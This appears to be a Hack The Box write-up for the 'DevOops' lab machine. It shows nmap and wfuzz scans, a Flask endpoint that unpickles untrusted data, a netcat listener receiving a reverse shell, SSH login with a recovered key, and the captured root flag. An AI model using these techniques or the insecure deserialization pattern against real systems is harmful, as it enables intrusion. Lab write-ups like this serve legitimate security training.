# Nmap 7.80 scan initiated Tue Mar 24 09:04:48 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.91 Nmap scan report for 10.10.10.91 Host is up (0.32s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA) | 256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA) |_ 256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519) 5000/tcp open http Gunicorn 19.7.1 |_http-server-header: gunicorn/19.7.1 |_http-title: Site doesn't have a title (text/html; charset=utf-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Mar 24 09:05:52 2020 -- 1 IP address (1 host up) scanned in 64.19 seconds
5000 port run as Python web server gunicorn,dirsearch and wfuzz scan directory
$ wfuzz --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.91:5000/FUZZ ... 000000126: 200 1815 L 24122 517022 Ch "feed" 000000366: 200 0 L 39 W 347 Ch "upload" 000019602: 405 4 L 23 W 178 Ch "newpost"
Getting User Flag
visit the homepage
1 2 3 4 5 6 7 8 9 10 11 12 13 14
<html> <body> Under construction!<br> <p> This is feed.py, which will become the MVP for Blogfeeder application. </p> <p> TODO: replace this with the proper feed from the dev.solita.fi backend. </p> <p> <imgsrc="/feed"align="center"width="60%"height="60%"> </p> </body> </html>
visit http://10.10.10.91:5000/upload, it should upload xml file including Author, Subject, Content elements. Try to upload a normal xml file.
@app.route("/newpost", methods=["POST"]) def newpost(): # TODO: proper save to database, this is for testing purposes right now picklestr = base64.urlsafe_b64decode(request.data) # return picklestr postObj = pickle.loads(picklestr) return "POST RECEIVED: " + postObj['Subject']
## TODO: VERY important! DISABLED THIS IN PRODUCTION #app = DebuggedApplication(app, evalex=True, console_path='/debugconsole') # TODO: Replace run-gunicorn.sh with real Linux service script #app = DebuggedApplication(app, evalex=True, console_path='/debugconsole')
if __name__ == "__main__": app.run(host='0.0.0,0', Debug=True)
$ nc -lvvp 9000 listening on [any] 9000 ... 10.10.10.91: inverse host lookup failed: Unknown host connect to [10.10.16.99] from (UNKNOWN) [10.10.10.91] 44014 /bin/sh: 0: can't access tty; job control turned off $ id uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo) $ python -c "import pty;pty.spawn('/bin/bash')" roosa@gitter:~/deploy/src$ id id uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo) roosa@gitter:~/deploy/src$ cd && ls -a user.txt cd && ls -a user.txt user.txt
# kali @ kali in ~/HackTheBox/DevOops [2:01:04] $ chmod 600 id_rsa
# kali @ kali in ~/HackTheBox/DevOops [2:01:19] $ ssh -i id_rsa roosa@10.10.10.91 The authenticity of host '10.10.10.91 (10.10.10.91)' can't be established. ECDSA key fingerprint is SHA256:hbD2D4PdnIVpAFHV8sSAbtM0IlTAIpYZ/nwspIdp4Vg. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.91' (ECDSA) to the list of known hosts. Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)
135 packages can be updated. 60 updates are security updates.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
roosa@gitter:~$ id uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
roosa@gitter:~/work/blogfeed$ git log --pretty=oneline 7ff507d029021b0915235ff91e6a74ba33009c6d Use Base64 for pickle feed loading 26ae6c8668995b2f09bf9e2809c36b156207bfa8 Set PIN to make debugging faster as it will no longer change every time the application code is changed. Remember to remove before production use. cec54d8cb6117fd7f164db142f0348a74d3e9a70 Debug support added to make development more agile. ca3e768f2434511e75bd5137593895bd38e1b1c2 Blogfeed app, initial version. dfebfdfd9146c98432d19e3f7d83cc5f3adbfe94 Gunicorn startup script 33e87c312c08735a02fa9c796021a4a3023129ad reverted accidental commit with proper key d387abf63e05c9628a59195cec9311751bdb283f add key for feed integration from tnerprise backend 1422e5a04d1b52a44e6dc81023420347e257ee5f Initial commit
135 packages can be updated. 60 updates are security updates.
Last login: Mon Mar 26 06:23:48 2018 from 192.168.57.1 root@gitter:~# id uid=0(root) gid=0(root) groups=0(root) root@gitter:~# cat root.txt d4fe1e7f7187407eebdd3209cb1ac7b3